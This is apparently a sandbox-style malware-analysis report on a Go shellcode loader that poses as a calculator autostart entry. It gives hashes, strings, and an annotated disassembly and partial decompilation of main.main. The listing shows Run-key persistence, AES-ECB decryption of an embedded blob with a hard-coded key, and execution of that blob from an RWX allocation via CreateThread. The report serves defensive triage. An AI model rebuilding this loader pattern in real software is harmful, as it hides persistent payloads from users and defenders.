File Information hashes and primary classification
File name
5
File size
1.3 MiB
Architecture
X64
- MD5
- 070a44cbc28301098463b40b9b3f21d4
- SHA1
- 4d6f008d5c63103f23643722550b4d4fc805368a
- SHA256
- fa755134d9c9796b2f58fd61aeb0ef12121da6afaa1943f05334d332992cdff5
- TLSH
- T141553a877cc115b9d0ba923188a612417b21fc661f3663d72b61b6f82f7bbd44e35328
- Imphash
- f0ea7b7844bbc5bfa9bb32efdcea957c
- Rich header
- -
Metadata parser-extracted fields
YARA Signatures 2 matching rules
Type.UNCOMMON
fingerprint
EnumerateProcesses
Type.INFO
compiler
Golang
Kesakode similarity verdict
Leslieloader
3.8%
0 malware hits
854 library hits
1217 clean hits
Anomalies signals worth reviewing
entropy:
BigBufferNoXrefMediumToHighEntropy
strings:
DynamicString
headers:
GuiSubsystemNoWindowApi
code:
HighXrefLoopingFunction
ManyHighValueImmediates
ManyUniqueImmediateBytes
SequentialFunction
SpaghettiFunction
XorInLoop
sections:
InvalidSizeOfInitializedData
UnbalancedVirtualPhysicalRatio
integrity:
NoChecksum
time:
TimeDateStampZero
Constants identified constants and patterns
crypto:
AES_Rijndael_S___ARIA_S1__8_byt_256
1
AES_Rijndael_Si___ARIA_X1__8_byt_256
1
Rijndael_Td0__0x51f4a750U___32_lil_1024
1
Rijndael_Td1__0x5051f4a7U___32_lil_1024
1
Rijndael_Td2__0xa75051f4U___32_lil_1024
1
Rijndael_Td3__0xf4a75051U___32_lil_1024
1
registry:
HKEY_CURRENT_USER
3
HKEY_USERS
2
autorun
1
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x427F49 | 010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000... | 1 | BINARY | 209 |
| 0x41F26B | 9A9999999999D53F00000000006A48410000000065CDCD41FCA9F1D24D62503F0000000000408F40 | 1 | BINARY | 204 |
| 0x49C0FD | Software\Microsoft\Windows\CurrentVersion\Run | 1 | ASCII | 167 |
| 0x42EAC9 | PowerRegisterSuspendResumeNotification | 1 | ASCII | 158 |
| 0x42E44F | AddVectoredContinueHandler | 1 | ASCII | 154 |
| 0x42F53D | QueryPerformanceFrequency | 1 | ASCII | 152 |
| 0x49D556 | runtime: warning: IsLongPathAwareProcess failed to enable long paths; proceeding in fixup mode\n | 1 | ASCII | 150 |
| 0x42F475 | GetSystemTimeAsFileTime | 1 | ASCII | 149 |
| 0x49D500 | QueryPerformanceFrequency overflow 32 bit divider, check nosplit discussion to proceed | 1 | ASCII | 148 |
| 0x533440 | !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;... | 7 | ASCII | 146 |
| 0x49D5B5 | 000102030405060708091011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575... | 3 | ASCII | 146 |
| 0x49D4B0 | QueryPerformanceFrequency syscall returned zero, running on unsupported hardware | 1 | ASCII | 146 |
| 0x42F4DB | QueryPerformanceCounter | 1 | ASCII | 146 |
| 0x42E974 | wine_get_version | 1 | ASCII | 145 |
| 0x42E6EF | RtlGetCurrentPeb | 1 | ASCII | 145 |
| 0x42E75D | RtlGetNtVersionNumbers | 1 | ASCII | 145 |
| 0x49D29B | runtime: internal error: misuse of lockOSThread/unlockOSThread | 1 | ASCII | 144 |
| 0x49D16A | runtime: GetQueuedCompletionStatusEx returned invalid mode= | 1 | ASCII | 144 |
| 0x49D398 | runtime.SetFinalizer: pointer not at beginning of allocated block | 1 | ASCII | 143 |
| 0x49CE22 | gcControllerState.findRunnable: blackening not enabled | 1 | ASCII | 143 |
| 0x49CBE4 | runtime: netpoll: PostQueuedCompletionStatus failed | 1 | ASCII | 143 |
| 0x42E8FF | WSAGetOverlappedResult | 1 | ASCII | 143 |
| 0x49421D | /dev/stderr | 1 | ASCII | 143 |
| 0x49D358 | runtime.SetFinalizer: first argument was allocated into an arena | 1 | ASCII | 142 |
| 0x49D2D9 | malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit` | 1 | ASCII | 142 |
| 0x49D0B9 | runtime: checkmarks found unexpected unmarked object obj= | 1 | ASCII | 142 |
| 0x49D25D | limiterEvent.stop: found wrong event in p's limiter event slot | 1 | ASCII | 141 |
| 0x49D12E | manual span allocation called with non-manually-managed type | 1 | ASCII | 141 |
| 0x49CF69 | mheap.freeSpanLocked - invalid free of user arena chunk | 1 | ASCII | 141 |
| 0x49CEFB | casfrom_Gscanstatus:top gp->status is not in scan state | 1 | ASCII | 141 |
| 0x49CCE7 | runtime.SetFinalizer: pointer not in allocated block | 1 | ASCII | 141 |
| 0x49CC7F | casfrom_Gscanstatus: gp->status is not in scan state | 1 | ASCII | 141 |
| 0x49CD4F | runtime: use of FixAlloc_Alloc before FixAlloc_Init\n | 1 | ASCII | 141 |
| 0x49CB7E | limiterEvent.stop: invalid limiter event type found | 1 | ASCII | 141 |
| 0x49CBB1 | potentially overlapping in-use allocations detected | 1 | ASCII | 141 |
| 0x49CB4B | fatal: systemstack called from unexpected goroutine | 1 | ASCII | 141 |
| 0x495629 | 0123456789abcdef | 2 | ASCII | 141 |
| 0x49D010 | profilealloc called without a P or outside bootstrapping | 1 | ASCII | 140 |
| 0x49CF32 | gentraceback callback cannot be used with non-zero skip | 1 | ASCII | 140 |
| 0x49CCB3 | mallocgc called without a P or outside bootstrapping | 1 | ASCII | 140 |
| 0x49C7A7 | runtime.preemptM: duplicatehandle failed; errno= | 1 | ASCII | 140 |
| 0x49BD9A | gcBgMarkWorker: unexpected gcMarkWorkerMode | 1 | ASCII | 140 |
| 0x42E686 | NtWaitForSingleObject | 1 | ASCII | 140 |
| 0x494228 | /dev/stdout | 1 | ASCII | 140 |
| 0x49CFA0 | failed to allocate aligned heap memory; too many retries | 1 | ASCII | 139 |
| 0x49CD1B | runtime: GetQueuedCompletionStatusEx failed (errno= | 1 | ASCII | 139 |
| 0x49CD83 | span set block with unpopped elements found in reset | 1 | ASCII | 139 |
| 0x49CAE7 | recursive call during initialization - linker skew | 1 | ASCII | 139 |
| 0x49CAB5 | mallocgc called with gcphase == _GCmarktermination | 1 | ASCII | 139 |
| 0x49CA20 | sweeper left outstanding across sweep generations | 1 | ASCII | 139 |
| 0x49C95C | panicwrap: unexpected string after package name: | 1 | ASCII | 139 |
| 0x49C867 | casgstatus: waiting for Gwaiting but is Grunnable | 1 | ASCII | 139 |
| 0x49C747 | CreateWaitableTimerEx when creating timer failed | 1 | ASCII | 139 |
| 0x49C807 | runtime: waitforsingleobject wait_failed; errno= | 1 | ASCII | 139 |
| 0x49C718 | tried to sleep scavenger from another goroutine | 1 | ASCII | 139 |
| 0x49C6BA | runtime: CreateIoCompletionPort failed (errno= | 1 | ASCII | 139 |
| 0x49C62D | finishGCTransition called without starting one? | 1 | ASCII | 139 |
| 0x49C48B | signal arrived during external code execution\n | 1 | ASCII | 139 |
| 0x49C31B | memory reservation exceeds address space limit | 1 | ASCII | 139 |
| 0x49C1B1 | runtime.minit: duplicatehandle failed; errno= | 1 | ASCII | 139 |
| 0x49C021 | gcmarknewobject called while doing checkmark | 1 | ASCII | 139 |
| 0x49BF9E | unknown runnable goroutine during bootstrap | 1 | ASCII | 139 |
| 0x4979EC | CalculatorApp_AutoStart | 1 | ASCII | 139 |
| 0x49D3D9 | user arena chunk size is not a mutliple of the physical page size | 1 | ASCII | 138 |
| 0x49D21F | found bad pointer in Go heap (incorrect use of unsafe or cgo?) | 1 | ASCII | 138 |
| 0x49CEC4 | is currently not supported for use in system callbacks | 1 | ASCII | 138 |
| 0x49CE58 | no goroutines (main called runtime.Goexit) - deadlock! | 1 | ASCII | 138 |
| 0x49CB19 | runtime: unable to acquire - semaphore out of sync | 1 | ASCII | 138 |
| 0x49C98D | runtime: unexpected waitm - semaphore out of sync | 1 | ASCII | 138 |
| 0x49C8C9 | fully empty unfreed span set block found in reset | 1 | ASCII | 138 |
| 0x49C7D7 | runtime: waitforsingleobject unexpected; result= | 1 | ASCII | 138 |
| 0x49C377 | released less than one physical page of memory | 1 | ASCII | 138 |
| 0x49C543 | tried to park scavenger from another goroutine | 1 | ASCII | 138 |
| 0x49C349 | panicwrap: unexpected string after type name: | 1 | ASCII | 138 |
| 0x49C265 | tried to run scavenger from another goroutine | 1 | ASCII | 138 |
| 0x49B946 | markWorkerStop: unknown mark worker mode | 1 | ASCII | 138 |
| 0x49B9E6 | runtime.preemptM: duplicatehandle failed | 1 | ASCII | 138 |
| 0x49B34C | _cgo_notify_runtime_init_done missing | 1 | ASCII | 138 |
| 0x42E5E7 | SystemFunction036 | 1 | ASCII | 138 |
| 0x49D080 | gentraceback cannot trace user goroutine on its own stack | 1 | ASCII | 137 |
| 0x49C898 | delayed zeroing on data that may contain pointers | 1 | ASCII | 137 |
| 0x49C777 | could not find GetSystemTimeAsFileTime() syscall | 1 | ASCII | 137 |
| 0x49C68B | racy sudog adjustment due to parking on channel | 1 | ASCII | 137 |
| 0x49C5FE | failed to acquire lock to start a GC transition | 1 | ASCII | 137 |
| 0x49C42F | runtime: text offset base pointer out of range | 1 | ASCII | 137 |
| 0x49C401 | runtime: panic before malloc heap initialized\n | 1 | ASCII | 137 |
| 0x49C1DE | runtime: CreateWaitableTimerEx failed; errno= | 1 | ASCII | 137 |
| 0x49C157 | exitsyscall: syscall frame is no longer valid | 1 | ASCII | 137 |
| 0x49C238 | transitioning GC to the same state as before? | 1 | ASCII | 137 |
| 0x49C20B | runtime: failed mSpanList.remove span.npages= | 1 | ASCII | 137 |
| 0x49C079 | out of memory allocating heap arena metadata | 1 | ASCII | 137 |
| 0x49C04D | no P available, write barriers are forbidden | 1 | ASCII | 137 |
| 0x49BF73 | unfinished open-coded defers in deferreturn | 1 | ASCII | 137 |
| 0x49BF48 | runtime:stoplockedm: lockedg (atomicstatus= | 1 | ASCII | 137 |
| 0x49BEC7 | runtime.SetFinalizer: first argument is nil | 1 | ASCII | 137 |
| 0x49BE9C | runtime.SetFinalizer: finalizer already set | 1 | ASCII | 137 |
| 0x49BBA5 | runtime: typeBitsBulkBarrier without type | 1 | ASCII | 137 |
| 0x49492E | iphlpapi.dll | 7 | ASCII | 137 |
| 0x493ECB | /dev/stdin | 1 | ASCII | 137 |
| 0x493D99 | ntdll.dll | 4 | ASCII | 137 |
| 0x49D0F2 | addr range base and limit are not in the same memory segment | 1 | ASCII | 136 |
| 0x49CA51 | attempt to execute system stack code on user stack | 1 | ASCII | 136 |
| 0x49C9BE | s.allocCount != s.nelems && freeIndex == s.nelems | 1 | ASCII | 136 |
| 0x49C571 | P has cached GC work at end of mark termination | 1 | ASCII | 136 |
| 0x49C65C | function symbol table not sorted by PC offset: | 1 | ASCII | 136 |
| 0x49C3D3 | runtime: name offset base pointer out of range | 1 | ASCII | 136 |
| 0x49BFC9 | active sweepers found at start of mark phase | 1 | ASCII | 136 |
| 0x49C0D1 | span on userArena.faultList has invalid size | 1 | ASCII | 136 |
| 0x49BF1D | runtime: releaseSudog with non-nil gp.param | 1 | ASCII | 136 |
| 0x49BE1B | methodValueCallFrameObjs is not in a module | 1 | ASCII | 136 |
| 0x49BE46 | non in-use span found with specials bit set | 1 | ASCII | 136 |
| 0x49BD1C | runtime: blocked write on closing polldesc | 1 | ASCII | 136 |
| 0x49BC9E | on a locked thread with no template thread | 1 | ASCII | 136 |
| 0x49B91E | invalid span in heapArena for user arena | 1 | ASCII | 136 |
| 0x49B746 | mspan.sweep: bad span state after sweep | 1 | ASCII | 136 |
| 0x49B809 | suspendG from non-preemptible goroutine | 1 | ASCII | 136 |
| 0x49B555 | cannot read stack of running goroutine | 1 | ASCII | 136 |
| 0x49B5ED | internal error: exit hook invoked exit | 1 | ASCII | 136 |
| 0x49B639 | makechan: invalid channel element type | 1 | ASCII | 136 |
| 0x49B405 | runtime.minit: duplicatehandle failed | 1 | ASCII | 136 |
| 0x49AF3C | persistentalloc: align is too large | 1 | ASCII | 136 |
| 0x407D3D | runtime error: | 1 | ASCII | 136 |
| 0x49D1A6 | runtime: netpoll: PostQueuedCompletionStatus failed (errno= | 2 | ASCII | 135 |
| 0x49C184 | produced a trigger greater than the heap goal | 1 | ASCII | 135 |
| 0x49C0A5 | runtime: lfstack.push invalid packing: node= | 1 | ASCII | 135 |
| 0x49BCC8 | out of memory allocating checkmarks bitmap | 1 | ASCII | 135 |
| 0x49BC4A | fatal error: cgo callback before cgo call\n | 1 | ASCII | 135 |
| 0x49BD46 | sweep: tried to preserve a user arena span | 1 | ASCII | 135 |
| 0x49BB7C | runtime: blocked read on closing polldesc | 1 | ASCII | 135 |
| 0x49BA86 | attempted to add zero-sized address range | 1 | ASCII | 135 |
| 0x49B8F6 | failed to acquire lock to reset capacity | 1 | ASCII | 135 |
| 0x49BA36 | runtime: out of memory: cannot allocate | 1 | ASCII | 135 |
| 0x49B996 | refill of span with free space remaining | 1 | ASCII | 135 |
| 0x49B6F8 | internal error: exit hook invoked panic | 1 | ASCII | 135 |
| 0x49B5A1 | gcBgMarkWorker: blackening not enabled | 1 | ASCII | 135 |
| 0x49B3E0 | internal error: unknown network type | 1 | ASCII | 135 |
| 0x49B09E | Unable to determine system directory | 1 | ASCII | 135 |
| 0x49B24E | runtime: wrong goroutine in newstack | 1 | ASCII | 135 |
| 0x49AE47 | attempt to clear non-empty span set | 1 | ASCII | 135 |
| 0x49ABC3 | stoplockedm: inconsistent locking | 1 | ASCII | 135 |
| 0x49C3A5 | runtime: failed to create new OS thread (have | 1 | ASCII | 134 |
| 0x49BDC5 | grew heap, but no adequate free space found | 1 | ASCII | 134 |
| 0x49BB2A | objects added out of order or overlapping | 1 | ASCII | 134 |
| 0x49B96E | must be able to track idle limiter event | 1 | ASCII | 134 |
| 0x49B76D | out of memory allocating heap arena map | 1 | ASCII | 134 |
| 0x49B4E3 | Unable to determine system directory: | 1 | ASCII | 134 |
| 0x49B474 | setprofilebucket: profile already set | 1 | ASCII | 134 |
| 0x49B10A | lfstack node allocated from the heap | 1 | ASCII | 134 |
| 0x49A971 | base outside usable address space | 1 | ASCII | 134 |
| 0x49ABA2 | stackalloc not on scheduler stack | 1 | ASCII | 134 |
| 0x49A3D2 | resetspinning: not a spinning m | 1 | ASCII | 134 |
| 0x499FE3 | checkdead: inconsistent counts | 1 | ASCII | 134 |
| 0x499D16 | string concatenation too long | 1 | ASCII | 134 |
| 0x49D1E2 | abiRegArgsType needs GC Prog, update methodValueCallFrameObjs | 2 | ASCII | 133 |
| 0x49BE71 | root level max pages doesn't fit in summary | 1 | ASCII | 133 |
| 0x49BB01 | mheap.freeSpanLocked - invalid stack free | 1 | ASCII | 133 |
| 0x49BAD8 | mheap.freeSpanLocked - invalid span state | 1 | ASCII | 133 |
| 0x49CFD8 | in gcMark expecting to see gcphase as _G | 1 | ASCII | 133 |
| 0x49B71F | mismatched count during itab table copy | 1 | ASCII | 133 |
| 0x49B7E2 | stack growth not allowed in system call | 1 | ASCII | 133 |
| 0x49B7BB | runtime: casfrom_Gscanstatus failed gp= | 1 | ASCII | 133 |
| 0x49B794 | runtime: blocked write on free polldesc | 1 | ASCII | 133 |
| 0x49B613 | m changed unexpectedly in cgocallbackg | 1 | ASCII | 133 |
| 0x49B6AB | unreachable method called. linker bug? | 1 | ASCII | 133 |
| 0x49B3BB | failed to reserve page summary memory | 1 | ASCII | 133 |
| 0x49B499 | startTheWorld: inconsistent mp->nextp | 1 | ASCII | 133 |
| 0x49B2DE | user arena span is on the wrong list | 1 | ASCII | 133 |
| 0x49B22A | runtime: unblock on closing polldesc | 1 | ASCII | 133 |
| 0x49B12E | runtime: VirtualQuery failed; errno= | 1 | ASCII | 133 |
| 0x49B0C2 | accessed data from freed user arena | 1 | ASCII | 133 |
| 0x49B032 | ) is not Grunnable or Gscanrunnable\n | 1 | ASCII | 133 |
| 0x49AEB0 | greyobject: obj not pointer-aligned | 1 | ASCII | 133 |
| 0x49ACD0 | doaddtimer: P already set in timer | 1 | ASCII | 133 |
| 0x49AC48 | Other_Default_Ignorable_Code_Point | 1 | ASCII | 133 |
| 0x49AAFD | runtime: name offset out of range | 1 | ASCII | 133 |
| 0x49AA37 | misrounded allocation in sysAlloc | 1 | ASCII | 133 |
| 0x49A86B | sweep increased allocation count | 1 | ASCII | 133 |
| 0x49A6AB | runtime: mcall function returned | 1 | ASCII | 133 |
| 0x49A60B | removespecial on invalid pointer | 1 | ASCII | 133 |
| 0x499FA7 | abi mismatch detected between | 1 | ASCII | 133 |
| 0x499562 | Prepended_Concatenation_Mark | 1 | ASCII | 133 |
| 0x49975A | missing stack in shrinkstack | 1 | ASCII | 133 |
| 0x499370 | sigsend: inconsistent state | 1 | ASCII | 133 |
| 0x49C4E7 | stopTheWorld: not stopped (status != _Pgcstop) | 1 | ASCII | 132 |
| 0x49BAAF | gcSweep being done but phase is not GCoff | 1 | ASCII | 132 |
| 0x49B685 | runtime: sudog with non-false isSelect | 1 | ASCII | 132 |
| 0x49B65F | runtime: blocked read on free polldesc | 1 | ASCII | 132 |
| 0x49B2BA | uncaching span but s.allocCount == 0 | 1 | ASCII | 132 |
| 0x49B206 | runtime: sudog with non-nil waitlink | 1 | ASCII | 132 |
| 0x49B272 | startm: P required for spinning=true | 1 | ASCII | 132 |
| 0x49AE8D | findrunnable: netpoll with spinning | 1 | ASCII | 132 |
| 0x49AFC8 | traceback did not unwind completely | 1 | ASCII | 132 |
| 0x49AD7A | runtime: g is running but p is not | 1 | ASCII | 132 |
| 0x49AD36 | out of memory allocating allArenas | 1 | ASCII | 132 |
| 0x49A9F5 | freeing stack not in a stack span | 1 | ASCII | 132 |
| 0x49AB1E | runtime: text offset out of range | 1 | ASCII | 132 |
| 0x49A58B | end outside usable address space | 1 | ASCII | 132 |
| 0x49A64B | runtime.semasleep wait_abandoned | 1 | ASCII | 132 |
| 0x49A7CB | scavenger state is already wired | 1 | ASCII | 132 |
| 0x49A7AB | scanstack: goroutine not stopped | 1 | ASCII | 132 |
| 0x49A2BB | bad write barrier buffer bounds | 1 | ASCII | 132 |
| 0x49A394 | non in-use span in unswept list | 1 | ASCII | 132 |
| 0x499706 | gcstopm: negative nmspinning | 1 | ASCII | 132 |
| 0x499626 | [originating from goroutine | 1 | ASCII | 132 |
| 0x499103 | address not a stack address | 1 | ASCII | 132 |
| 0x498DEB | entersyscall inconsistent | 1 | ASCII | 132 |
| 0x49451F | shell32.dll | 4 | ASCII | 132 |
| 0x49CE8E | runtime: signal received on thread not created by Go.\n | 3 | ASCII | 131 |
| 0x49C2BF | (bad use of unsafe.Pointer? try -d=checkptr)\n | 1 | ASCII | 131 |
| 0x49BC20 | acquireSudog: found s.elem != nil in cache | 1 | ASCII | 131 |
| 0x49B8CE | cannot free workbufs when work.full != 0 | 1 | ASCII | 131 |
| 0x49B371 | all goroutines are asleep - deadlock! | 1 | ASCII | 131 |
| 0x49B176 | runtime: invalid pc-encoded table f= | 1 | ASCII | 131 |
| 0x49AF82 | runtime: close polldesc w/o unblock | 1 | ASCII | 131 |
| 0x49AED3 | mheap.freeSpanLocked - invalid free | 1 | ASCII | 131 |
| 0x49AEF6 | mismatched begin/end of activeSweep | 1 | ASCII | 131 |
| 0x49AC8C | VirtualQuery for stack base failed | 1 | ASCII | 131 |
| 0x49ABE4 | timer period must be non-negative | 1 | ASCII | 131 |
| 0x49AB3F | runtime: type offset out of range | 1 | ASCII | 131 |
| 0x49AA79 | runtime: failed mSpanList.insert | 1 | ASCII | 131 |
| 0x49A5AB | invalid limiter event type found | 1 | ASCII | 131 |
| 0x49A54B | " not supported for cpu option " | 1 | ASCII | 131 |
| 0x499D8B | in prepareForSweep; sweepgen | 1 | ASCII | 131 |
| 0x499A24 | addspecial on invalid pointer | 1 | ASCII | 131 |
| 0x499262 | mspan.sweep: bad span state | 1 | ASCII | 131 |
| 0x495959 | castogscanstatus | 1 | ASCII | 131 |
| 0x4946A6 | CreateThread | 1 | ASCII | 131 |
| 0x49493A | kernel32.dll | 12 | ASCII | 131 |
| 0x494862 | advapi32.dll | 11 | ASCII | 131 |
| 0x4B1C50 | 333333 | 1 | ASCII | 131 |
| 0x49C8FA | invalid memory address or nil pointer dereference | 4 | ASCII | 130 |
| 0x49BD70 | unexpected signal during runtime execution | 2 | ASCII | 130 |
| 0x49BBCE | stopTheWorld: not stopped (stopwait != 0) | 1 | ASCII | 130 |
| 0x49B830 | traceback: unexpected SPWRITE function | 1 | ASCII | 130 |
| 0x49B44F | runtime: unexpected SPWRITE function | 1 | ASCII | 130 |
| 0x49B1BE | runtime: marked free object in span | 1 | ASCII | 130 |
| 0x49B1E2 | runtime: mcall called on m->g0 stack | 1 | ASCII | 130 |
| 0x49AD9C | schedule: spinning with local work | 1 | ASCII | 130 |
| 0x49AA9A | runtime: failed to decommit pages | 1 | ASCII | 130 |
| 0x49A74B | runtime: sudog with non-nil elem | 1 | ASCII | 130 |
| 0x49A70B | runtime: setevent failed; errno= | 1 | ASCII | 130 |
| 0x49A66B | runtime: failed to release pages | 1 | ASCII | 130 |
| 0x49A318 | casgstatus: bad incoming values | 1 | ASCII | 130 |
| 0x49A375 | internal error - misuse of itab | 1 | ASCII | 130 |
| 0x49A0B5 | runqputslow: queue is not full | 1 | ASCII | 130 |
| 0x499D33 | timeBegin/EndPeriod not found | 1 | ASCII | 130 |
| 0x499BD7 | runtime.semasleep wait_failed | 1 | ASCII | 130 |
| 0x499802 | runtime.semasleep unexpected | 1 | ASCII | 130 |
| 0x498F71 | startlockedm: locked to me | 1 | ASCII | 130 |
| 0x498FA5 | wakep: negative nmspinning | 1 | ASCII | 130 |
| 0x498F57 | shrinking stack in libcall | 1 | ASCII | 130 |
| 0x498935 | missing stack in newstack | 1 | ASCII | 130 |
| 0x49C45D | runtime: type offset base pointer out of range | 2 | ASCII | 129 |
| 0x49B8A6 | bulkBarrierPreWrite: unaligned arguments | 2 | ASCII | 129 |
| 0x49AF5F | pidleput: P has non-empty run queue | 1 | ASCII | 129 |
| 0x49AD14 | mspan.ensureSwept: m is not locked | 1 | ASCII | 129 |
Functions high-value functions
Function listings
0x47BE20 main str 6 api 0 imm 18 Unknown
; main.main: program entry point of the Go loader (x64 Windows, Intel operand order as printed by the tool).
; Flow visible in this listing:
;   1. main.enableAutoStart()                          (registry persistence, listed separately)
;   2. copy a 0x25660-byte embedded blob from 0x4B4FA8 to the heap
;   3. main.AesDecryptByECB(blob, 16-byte key string)  (body not shown here; AES-ECB inferred from the name)
;   4. VirtualAlloc(0, len, 0x3000, 0x40) -> RtlMoveMemory -> CreateThread -> WaitForSingleObject
; Triage notes:
;   - The key is a static string in the binary, so the blob can be decrypted offline for inspection.
;   - 0x40 is PAGE_EXECUTE_READWRITE; an RWX allocation followed by a thread started inside it is the
;     behaviour to look for in endpoint telemetry.
;   - None of the syscall.(*Proc).Call results are error-checked in this function.
main.main() {
; Go prologue: if rsp is at or below the bound at [r14+0x10], go to .2 (grow stack, restart).
cmp rsp, [r14+0x10]
jbe .2
; 0xFFFFFFFFFFFFFF80 == -0x80: reserve a 0x80-byte frame and save rbp at its top.
add rsp, 0xFFFFFFFFFFFFFF80
mov [rsp+0x78], rbp
lea rbp, [rsp+0x78]
; Persistence is attempted first, before the payload is touched.
call main.enableAutoStart()
; Allocate a heap object (type descriptor 0x484640) and copy the embedded blob into it:
; 0x4ACC qwords * 8 = 0x25660 bytes, source 0x4B4FA8.
lea rax, [0x484640]
call runtime.newobject()
mov rdi, rax
lea rsi, [0x4B4FA8]
mov ecx, 0x4ACC
rep movsq
; Arguments for AesDecryptByECB: rax = blob pointer (unchanged by rep movsq),
; rbx/rcx = length and capacity 0x25660, rdi/esi = key string pointer and length 0x10.
mov ebx, 0x25660
mov rcx, rbx
lea rdi, ["1ws12uuu11j*p5fr"]
mov esi, 0x10
call main.AesDecryptByECB()
; Keep the returned slice: [rsp+0x48] = data pointer, [rsp+0x30] = length.
mov [rsp+0x48], rax
mov [rsp+0x30], rbx
; Resolve the four kernel32 exports at run time (string pointer + length per call).
lea rax, ["kernel32.dll"]
mov ebx, 0x0C
call syscall.MustLoadDLL()
; [rsp+0x40] = *DLL handle for kernel32.dll
mov [rsp+0x40], rax
lea rbx, ["VirtualAlloc"]
mov ecx, 0x0C
call syscall.(*DLL).MustFindProc()
; [rsp+0x58] = VirtualAlloc
mov [rsp+0x58], rax
lea rbx, ["RtlMoveMemory"]
mov ecx, 0x0D
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
; [rsp+0x60] = RtlMoveMemory
mov [rsp+0x60], rax
lea rbx, ["CreateThread"]
mov ecx, 0x0C
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
; [rsp+0x68] = CreateThread
mov [rsp+0x68], rax
lea rbx, ["WaitForSingleObject"]
mov ecx, 0x13
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
; [rsp+0x50] = WaitForSingleObject
mov [rsp+0x50], rax
; Build a 4-element argument array (type 0x484B20) for VirtualAlloc:
;   [0] = 0 (left as allocated), [1] = decrypted length,
;   [2] = 0x3000 (MEM_COMMIT|MEM_RESERVE), [3] = 0x40 (PAGE_EXECUTE_READWRITE).
lea rax, [0x484B20]
call runtime.newobject()
mov rcx, [rsp+0x30]
mov [rax+0x08], rcx
mov qword ptr [rax+0x10], 0x3000
mov qword ptr [rax+0x18], 0x40
; Proc.Call(proc = rax, args = rbx, len = rcx = 4, cap = rdi = 4)
mov rbx, rax
mov edi, 0x04
mov rax, [rsp+0x58]
mov rcx, rdi
nop
call syscall.(*Proc).Call()
; Bounds check on the decrypted slice: a zero length goes to .1 (runtime.panicIndex).
; The VirtualAlloc result in rax is stored below without a NULL check.
mov rcx, [rsp+0x30]
test rcx, rcx
jbe .1
; [rsp+0x38] = address returned by VirtualAlloc
mov [rsp+0x38], rax
mov rcx, [rsp+0x48]
mov [rsp+0x70], rcx
; 3-element argument array (type 0x484A60) for RtlMoveMemory:
;   [0] = destination (allocated region), [1] = source (decrypted data), [2] = length.
lea rax, [0x484A60]
call runtime.newobject()
mov rcx, [rsp+0x38]
mov [rax], rcx
mov rdx, [rsp+0x70]
mov [rax+0x08], rdx
mov rdx, [rsp+0x30]
mov [rax+0x10], rdx
mov rbx, rax
mov edi, 0x03
mov rax, [rsp+0x60]
mov rcx, rdi
call syscall.(*Proc).Call()
; 6-element argument array (type 0x484C40) for CreateThread. Only slot [2] (offset 0x10,
; the start address) is non-zero and it is the allocated region; slots [3],[4] are written
; from xmm15 (the fixed zero register in Go's amd64 ABI) and slot [5] is set to 0.
lea rax, [0x484C40]
call runtime.newobject()
mov rcx, [rsp+0x38]
mov [rax+0x10], rcx
movups [rax+0x18], xmm15
mov qword ptr [rax+0x28], 0x00
mov rbx, rax
mov ecx, 0x06
mov rdi, rcx
mov rax, [rsp+0x68]
call syscall.(*Proc).Call()
; [rsp+0x28] = thread handle returned by CreateThread
mov [rsp+0x28], rax
; 2-element argument array (type 0x484940) for WaitForSingleObject(handle, 0xFFFFFFF).
; NOTE(review): the timeout is 0x0FFFFFFF ms (seven F digits, roughly 3.1 days), not
; INFINITE (0xFFFFFFFF); main returns after that even if the thread is still running.
lea rax, [0x484940]
call runtime.newobject()
mov rcx, [rsp+0x28]
mov [rax], rcx
mov qword ptr [rax+0x08], 0xFFFFFFF
mov rbx, rax
mov ecx, 0x02
mov rdi, rcx
mov rax, [rsp+0x50]
call syscall.(*Proc).Call()
; Release the kernel32 DLL object, restore rbp and the frame, return.
mov rax, [rsp+0x40]
call syscall.(*DLL).Release()
mov rbp, [rsp+0x78]
sub rsp, 0xFFFFFFFFFFFFFF80
ret
; .1: index 0 requested on an empty decrypted slice -> Go runtime panic.
.1:
xor eax, eax
mov rcx, rax
call runtime.panicIndex()
nop
; .2: stack too small -> grow it and re-enter the function from the top.
.2:
call runtime.morestack_noctxt()
jmp main.main()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of main.main (same function as the disassembly at 0x47BE20).
 * Reading aids:
 *   - register0x00000020 is the decompiler's name for the stack pointer on entry.
 *   - The repeated stores of code addresses to (register0x00000020 + -0x88) look like the
 *     decompiler modelling the return address pushed by each call; they are not program logic.
 *   - The outer do/while is the Go stack-growth retry loop, not a real loop in the source.
 * Stack slots used below: -0x38 decrypted data pointer, -0x50 decrypted length, -0x40 kernel32
 * DLL object, -0x28 VirtualAlloc, -0x20 RtlMoveMemory, -0x18 CreateThread,
 * -0x30 WaitForSingleObject, -0x48 allocated region, -0x58 thread handle.
 */
void main.main(void)
{
undefined8 *puVar1;
undefined8 uVar2;
undefined8 *puVar3;
int64_t iVar4;
undefined *puVar5;
undefined *unaff_RBP;
undefined8 *puVar6;
int64_t unaff_R14;
uint8_t uVar7;
undefined in_XMM15 [16];
undefined auVar8 [16];
/* uVar7 stands in for the direction flag of rep movsq; it is 0, so the copy below walks forward. */
uVar7 = 0;
do {
puVar5 = register0x00000020;
/* Stack-bound check: enough stack, run the body; otherwise fall to morestack at the bottom. */
if (*(unaff_R14 + 0x10) < register0x00000020) {
puVar5 = register0x00000020 + -0x80;
*(register0x00000020 + -8) = unaff_RBP;
unaff_RBP = register0x00000020 + -8;
*(register0x00000020 + -0x88) = 0x47be3d;
/* Registry persistence is attempted before anything else. */
main.enableAutoStart();
*(register0x00000020 + -0x88) = 0x47be49;
puVar1 = runtime.newobject(0x484640);
/* Copy 0x4acc qwords (0x25660 bytes) of embedded data from 0x4b4fa8 into the new object. */
puVar3 = 0x4b4fa8;
puVar6 = puVar1;
for (iVar4 = 0x4acc; iVar4 != 0; iVar4 = iVar4 + -1) {
*puVar6 = *puVar3;
